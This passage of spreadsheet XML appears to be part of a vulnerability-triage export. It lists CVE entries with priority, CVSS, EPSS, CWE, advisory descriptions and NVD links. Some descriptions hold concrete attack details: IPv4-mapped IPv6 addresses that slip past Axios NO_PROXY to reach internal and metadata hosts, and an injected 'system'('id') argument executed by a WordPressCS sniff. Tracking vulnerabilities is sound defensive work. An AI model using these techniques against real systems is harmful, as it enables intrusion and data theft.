      <c r="A1375" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89250</t>
        </is>
      </c>
      <c r="C1375" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1375" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1375" s="5" t="inlineStr"/>
      <c r="F1375" s="5" t="inlineStr"/>
      <c r="G1375" s="5" t="inlineStr"/>
      <c r="H1375" s="5" t="inlineStr"/>
      <c r="I1375" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1375" s="5" t="inlineStr"/>
      <c r="K1375" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1375" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains an unauthenticated file read vulnerability in the getRecordedFile.php endpoint that streams recorded FLV files from the temporary directory. Attackers can request the endpoint with a known or guessed stream key to download recorded live video files without authentication or authorization checks.</t>
        </is>
      </c>
      <c r="M1375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89250</t>
        </is>
      </c>
    </row>
    <row r="1376">
      <c r="A1376" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1376" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-35585</t>
        </is>
      </c>
      <c r="C1376" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1376" s="5" t="inlineStr"/>
      <c r="F1376" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1376" s="5" t="inlineStr"/>
      <c r="H1376" s="5" t="inlineStr"/>
      <c r="I1376" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1376" s="5" t="inlineStr"/>
      <c r="K1376" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1376" s="5" t="inlineStr">
        <is>
          <t>Oxford Nanopore MinKNOW before 24.06 relies on a client's source IP address for authentication.</t>
        </is>
      </c>
      <c r="M1376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-35585</t>
        </is>
      </c>
    </row>
    <row r="1377">
      <c r="A1377" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1377" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-61732</t>
        </is>
      </c>
      <c r="C1377" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1377" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1377" s="5" t="inlineStr"/>
      <c r="F1377" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1377" s="5" t="inlineStr"/>
      <c r="H1377" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I1377" s="5" t="inlineStr">
        <is>
          <t>2026-02-05</t>
        </is>
      </c>
      <c r="J1377" s="5" t="inlineStr"/>
      <c r="K1377" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1377" s="5" t="inlineStr">
        <is>
          <t>A discrepancy between how Go and C/C++ comments were parsed allowed for code smuggling into the resulting cgo binary.</t>
        </is>
      </c>
      <c r="M1377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-61732</t>
        </is>
      </c>
    </row>
    <row r="1378">
      <c r="A1378" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10754</t>
        </is>
      </c>
      <c r="C1378" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1378" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1378" s="5" t="inlineStr"/>
      <c r="F1378" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1378" s="5" t="inlineStr"/>
      <c r="H1378" s="5" t="inlineStr"/>
      <c r="I1378" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1378" s="5" t="inlineStr"/>
      <c r="K1378" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1378" s="5" t="inlineStr">
        <is>
          <t>Pega Platform versions 8.5.0 through 25.1.2 are affected by an improper validation of cryptographic signatures that may allow an attacker to bypass security controls.</t>
        </is>
      </c>
      <c r="M1378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10754</t>
        </is>
      </c>
    </row>
    <row r="1379">
      <c r="A1379" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14962</t>
        </is>
      </c>
      <c r="C1379" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1379" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1379" s="5" t="inlineStr"/>
      <c r="F1379" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1379" s="5" t="inlineStr"/>
      <c r="H1379" s="5" t="inlineStr"/>
      <c r="I1379" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1379" s="5" t="inlineStr"/>
      <c r="K1379" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1379" s="5" t="inlineStr">
        <is>
          <t>The ELEX WooCommerce Request a Quote WordPress plugin before 2.4.1 does not properly sanitise and escape a parameter before using it in a SQL query, allowing unauthenticated users to perform SQL injection attacks and extract arbitrary data from the database.</t>
        </is>
      </c>
      <c r="M1379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14962</t>
        </is>
      </c>
    </row>
    <row r="1380">
      <c r="A1380" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19233</t>
        </is>
      </c>
      <c r="C1380" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1380" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1380" s="5" t="inlineStr"/>
      <c r="F1380" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1380" s="5" t="inlineStr"/>
      <c r="H1380" s="5" t="inlineStr"/>
      <c r="I1380" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1380" s="5" t="inlineStr"/>
      <c r="K1380" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1380" s="5" t="inlineStr">
        <is>
          <t>CWE-918: Server-Side Request Forgery (SSRF) vulnerability exists that could cause unauthorized command execution and disclosure of server data when an attacker with a privileged account sends crafted, unvalidated parameters to a server endpoint.</t>
        </is>
      </c>
      <c r="M1380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19233</t>
        </is>
      </c>
    </row>
    <row r="1381">
      <c r="A1381" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21087</t>
        </is>
      </c>
      <c r="C1381" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1381" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1381" s="5" t="inlineStr"/>
      <c r="F1381" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1381" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1381" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="I1381" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1381" s="5" t="inlineStr"/>
      <c r="K1381" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1381" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in libmdnie.so prior to SMR Sep-2026 Release 1 allows local attackers to execute arbitrary code with system server privilege.</t>
        </is>
      </c>
      <c r="M1381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21087</t>
        </is>
      </c>
    </row>
    <row r="1382">
      <c r="A1382" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25990</t>
        </is>
      </c>
      <c r="C1382" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1382" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1382" s="5" t="inlineStr"/>
      <c r="F1382" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1382" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1382" s="5" t="inlineStr">
        <is>
          <t>python:pillow</t>
        </is>
      </c>
      <c r="I1382" s="5" t="inlineStr">
        <is>
          <t>2026-02-11</t>
        </is>
      </c>
      <c r="J1382" s="5" t="inlineStr"/>
      <c r="K1382" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1382" s="5" t="inlineStr">
        <is>
          <t>Pillow is a Python imaging library. From 10.3.0 to before 12.1.1, an out-of-bounds write may be triggered when loading a specially crafted PSD image. This vulnerability is fixed in 12.1.1.</t>
        </is>
      </c>
      <c r="M1382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25990</t>
        </is>
      </c>
    </row>
    <row r="1383">
      <c r="A1383" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26212</t>
        </is>
      </c>
      <c r="C1383" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1383" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1383" s="5" t="inlineStr"/>
      <c r="F1383" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1383" s="5" t="inlineStr"/>
      <c r="H1383" s="5" t="inlineStr"/>
      <c r="I1383" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1383" s="5" t="inlineStr"/>
      <c r="K1383" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L1383" s="5" t="inlineStr">
        <is>
          <t>Rara One Click Demo Import plugin for WordPress before 1.3.5 contains an arbitrary file upload vulnerability that allows authenticated attackers with Administrator privileges to upload arbitrary PHP files by passing a false value to wp_handle_upload() that disables WordPress core's file type validation checks across all three file parameters in the process_uploaded_files() function. Attackers can upload a malicious PHP file to the uploads directory and execute it over HTTP to achieve remote code execution in the web server process, with the uploaded file persisting on disk even after plugin deactivation and leaving no media library record to evade standard integrity checks.</t>
        </is>
      </c>
      <c r="M1383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26212</t>
        </is>
      </c>
    </row>
    <row r="1384">
      <c r="A1384" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34223</t>
        </is>
      </c>
      <c r="C1384" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1384" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1384" s="5" t="inlineStr"/>
      <c r="F1384" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1384" s="5" t="inlineStr"/>
      <c r="H1384" s="5" t="inlineStr"/>
      <c r="I1384" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1384" s="5" t="inlineStr"/>
      <c r="K1384" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1384" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Desigo CC ClickOnce Client V6 (All versions), Desigo CC ClickOnce Client V7 (All versions), Desigo CC family V8 (All versions), Desigo CC family V9 (All versions), Desigo CC Flex Client V6 (All versions), Desigo CC Flex Client V7 (All versions), Desigo CC Installed Client V6 (All versions), Desigo CC Installed Client V7 (All versions). The affected application is vulnerable to Client Code Execution (CCE) due to insufficient input validation when handling scripts embedded within user-defined graphics documents.  Specifically, when the script within a graphics document is designed or modified by an attacker to include malicious commands.  When a user opens a compromised graphics document, the embedded script is executed on the client application instance, allowing an attacker to write arbitrary files to the client's operating system. Successful exploitation requires an attacker to craft a malicious graphics document and entice a user with sufficient privileges to display it.  This could lead to compromise of the client operating system and potential lateral movement within the organization.</t>
        </is>
      </c>
      <c r="M1384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34223</t>
        </is>
      </c>
    </row>
    <row r="1385">
      <c r="A1385" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34741</t>
        </is>
      </c>
      <c r="C1385" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1385" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1385" s="5" t="inlineStr"/>
      <c r="F1385" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1385" s="5" t="inlineStr"/>
      <c r="H1385" s="5" t="inlineStr"/>
      <c r="I1385" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1385" s="5" t="inlineStr"/>
      <c r="K1385" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1385" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, authentication bypass allows unauthenticated remote attackers to execute arbitrary PHP files from the env-production directory on a new iTop instance in the production environment. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M1385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34741</t>
        </is>
      </c>
    </row>
    <row r="1386">
      <c r="A1386" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4129</t>
        </is>
      </c>
      <c r="C1386" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1386" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1386" s="5" t="inlineStr"/>
      <c r="F1386" s="5" t="inlineStr"/>
      <c r="G1386" s="5" t="inlineStr"/>
      <c r="H1386" s="5" t="inlineStr"/>
      <c r="I1386" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1386" s="5" t="inlineStr"/>
      <c r="K1386" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1386" s="5" t="inlineStr">
        <is>
          <t>There is an improper access control vulnerability in NI SystemLink that may allow an authenticated user with limited privileges to access host operating system files and directories that should be restricted. This vulnerability affects NI SystemLink and NI SystemLink Server 2026 Q3 and prior versions.</t>
        </is>
      </c>
      <c r="M1386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4129</t>
        </is>
      </c>
    </row>
    <row r="1387">
      <c r="A1387" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44492</t>
        </is>
      </c>
      <c r="C1387" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1387" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1387" s="5" t="inlineStr"/>
      <c r="F1387" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1387" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1387" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I1387" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J1387" s="5" t="inlineStr"/>
      <c r="K1387" s="5" t="inlineStr">
        <is>
          <t>CWE-289, CWE-918</t>
        </is>
      </c>
      <c r="L1387" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios does not normalise IPv4-mapped IPv6 addresses. When NO_PROXY lists an IPv4 address such as 127.0.0.1 or 169.254.169.254, a request URL using the IPv4-mapped IPv6 form (::ffff:7f00:1, ::ffff:a9fe:a9fe) still routes through the configured proxy. Node.js resolves these addresses to the underlying IPv4 host, so the request reaches the internal service via the proxy rather than being blocked. This vulnerability is fixed in 0.32.0 and 1.16.0.</t>
        </is>
      </c>
      <c r="M1387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44492</t>
        </is>
      </c>
    </row>
    <row r="1388">
      <c r="A1388" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45293</t>
        </is>
      </c>
      <c r="C1388" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1388" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1388" s="5" t="inlineStr"/>
      <c r="F1388" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1388" s="5" t="inlineStr"/>
      <c r="H1388" s="5" t="inlineStr"/>
      <c r="I1388" s="5" t="inlineStr">
        <is>
          <t>2026-07-28</t>
        </is>
      </c>
      <c r="J1388" s="5" t="inlineStr"/>
      <c r="K1388" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L1388" s="5" t="inlineStr">
        <is>
          <t>WordPress Coding Standards is a set of PHP_CodeSniffer rules (sniffs) that enforce WordPress coding conventions. From 0.14.1 until 3.4.1, the WordPress.WP.EnqueuedResourceParameters sniff (active in the WordPress and WordPress-Extra rulesets) reconstructed the $ver argument passed to functions such as wp_enqueue_script() and ran it through eval() inside its is_falsy() method, so a maliciously crafted argument such as 'system'('id') would execute during a scan; as a result, running PHPCS with WordPressCS over untrusted PHP (for example a CI pipeline that lints pull requests, or a developer reviewing third-party code) could lead to arbitrary command execution on the scanning host. The WordPress-Core and WordPress-Docs rulesets are not affected. This issue is fixed in version 3.4.1.</t>
        </is>
      </c>
      <c r="M1388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45293</t>
        </is>
      </c>
    </row>
    <row r="1389">
      <c r="A1389" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47194</t>
        </is>
      </c>
      <c r="C1389" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1389" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1389" s="5" t="inlineStr"/>
      <c r="F1389" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1389" s="5" t="inlineStr"/>
      <c r="H1389" s="5" t="inlineStr"/>
      <c r="I1389" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J1389" s="5" t="inlineStr"/>
      <c r="K1389" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L1389" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework. Prior to 15.108.0 and 16.18.3, temporary magic login link generation can use an attacker-controlled request Host header, allowing a remote attacker to cause emailed login links to point to an attacker-controlled domain and capture the login token when a recipient follows the link. This issue is fixed in versions 15.108.0 and 16.18.3.</t>
        </is>
      </c>
      <c r="M1389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47194</t>
        </is>
      </c>
    </row>
    <row r="1390">
      <c r="A1390" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47664</t>
        </is>
      </c>
      <c r="C1390" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1390" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1390" s="5" t="inlineStr"/>
      <c r="F1390" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1390" s="5" t="inlineStr"/>
      <c r="H1390" s="5" t="inlineStr"/>
      <c r="I1390" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1390" s="5" t="inlineStr"/>
      <c r="K1390" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-345, CWE-918</t>
        </is>
      </c>
      <c r="L1390" s="5" t="inlineStr">
        <is>
          <t>Pathling is a set of tools that make it easier to use FHIR and clinical terminology within health data analytics. Prior to version 2.0.0 of Pathling Server, the `$import-pnp` operation in Pathling Server accepts a caller-supplied `exportUrl` and uses it as the remote FHIR Bulk Export endpoint without constraining it to a trusted source. When PNP credentials are configured, Pathling builds a credentialed bulk-export client targeting the caller-chosen host, downloads manifest-selected files, and then reclassifies those staged files as trusted local `file://` imports - bypassing the configured `allowableSources` allowlist that protects the ordinary `$import` operation. This is fixed in Pathling Server 2.0.0. As a workaround, disable the `$import-pnp` operation (`pathling.operations.importPnpEnabled=false`) or do not configure PNP credentials.</t>
        </is>
      </c>
      <c r="M1390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47664</t>
        </is>
      </c>
    </row>
    <row r="1391">
      <c r="A1391" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47727</t>
        </is>
      </c>
      <c r="C1391" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1391" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1391" s="5" t="inlineStr"/>
      <c r="F1391" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1391" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1391" s="5" t="inlineStr"/>
      <c r="I1391" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1391" s="5" t="inlineStr"/>
      <c r="K1391" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L1391" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions prior to 0.104.0, the default-on "Safe import" filter fails to neutralize the shareTemplate relation because that relation is not marked as dangerous, allowing an attacker-supplied import archive to plant a server-side template that leads to remote code execution. The relation is omitted from the built-in list of dangerous attributes, so unlike other code-loading relations it is not disabled on import, and when the victim later publishes the imported note the public share renderer feeds the linked EJS code note's raw bytes into ejs.render, which compiles them in the server's Node process. An unauthenticated request to the shared note then executes the attacker's JavaScript with full access to require, process, the filesystem, and the network. This issue is fixed in version 0.104.0.</t>
        </is>
      </c>
      <c r="M1391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47727</t>
        </is>
      </c>
    </row>
    <row r="1392">
      <c r="A1392" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48007</t>
        </is>
      </c>
      <c r="C1392" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1392" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1392" s="5" t="inlineStr"/>
      <c r="F1392" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1392" s="5" t="inlineStr"/>
      <c r="H1392" s="5" t="inlineStr"/>
      <c r="I1392" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1392" s="5" t="inlineStr"/>
      <c r="K1392" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1392" s="5" t="inlineStr">
        <is>
          <t>Element Call is a native Matrix video conferencing application. Versions 0.5.17 through 0.19.3 report analytics data to a PostHog server, when configured to by a `posthog` key in config.json or by the `posthogApiHost` and `posthogApiKey` URL parameters. Several fields of this data (`$initial_person_info`, `$session_entry_url`, and `$current_url`) were found to contain the full URL of the user's visited page, including the fragment. Users of a standalone Element Call ‘SPA’ instance such as https://call.element.io may therefore have reported the full URLs of certain calls, including encryption passwords, to the configured PostHog server, potentially compromising the confidentiality of the calls to actors who could access both the PostHog analytics data and the encrypted media streams. The same issue is present in Element Call's embedded package, but in practice it does not impact applications using this package (including Element Web, Element Desktop, Element X iOS, and Element X Android) because they distribute encryption keys over Matrix rather than encoding a password in the URL. The issue is patched in Element Call 0.19.4. Some workarounds are available. Users may opt out of analytics in the 'Feedback' tab of Element Call's settings and create new links for future calls. Admins who host Element Call as a standalone application may disable PostHog analytics entirely by removing the `posthog` key from their deployment's config.json file.</t>
        </is>
      </c>
      <c r="M1392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48007</t>
        </is>
      </c>
    </row>
    <row r="1393">
      <c r="A1393" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48120</t>
        </is>
      </c>
      <c r="C1393" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1393" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1393" s="5" t="inlineStr"/>
      <c r="F1393" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1393" s="5" t="inlineStr"/>
      <c r="H1393" s="5" t="inlineStr"/>
      <c r="I1393" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1393" s="5" t="inlineStr"/>
      <c r="K1393" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L1393" s="5" t="inlineStr">
        <is>
          <t>Kakoune is a code editor. Prior to version 2026.05.21, the bundled, enabled by default, `autorestore.kak` script can be exploited by malicious backup files leading to arbitrary kakoune and shell commands being executed by simply opening a file. Kakoune 2026.05.21 fixes the issue. As a workaround, add `autorestore-disable` to the user kakrc will disable the autorestore feature.</t>
        </is>
      </c>
      <c r="M1393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48120</t>
        </is>
      </c>
    </row>
    <row r="1394">
      <c r="A1394" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49310</t>
        </is>
      </c>
      <c r="C1394" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1394" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1394" s="5" t="inlineStr"/>
      <c r="F1394" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1394" s="5" t="inlineStr"/>
      <c r="H1394" s="5" t="inlineStr"/>
      <c r="I1394" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1394" s="5" t="inlineStr"/>
      <c r="K1394" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="L1394" s="5" t="inlineStr">
        <is>
          <t>Permission control vulnerability in the event notification module.
Impact: Successful exploitation of this vulnerability may affect service confidentiality.</t>
        </is>
      </c>
      <c r="M1394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49310</t>
        </is>
      </c>
    </row>
    <row r="1395">
      <c r="A1395" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49864</t>
        </is>
      </c>
      <c r="C1395" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1395" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1395" s="5" t="inlineStr"/>
      <c r="F1395" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1395" s="5" t="inlineStr"/>
      <c r="H1395" s="5" t="inlineStr"/>
      <c r="I1395" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1395" s="5" t="inlineStr"/>
      <c r="K1395" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1395" s="5" t="inlineStr">
        <is>
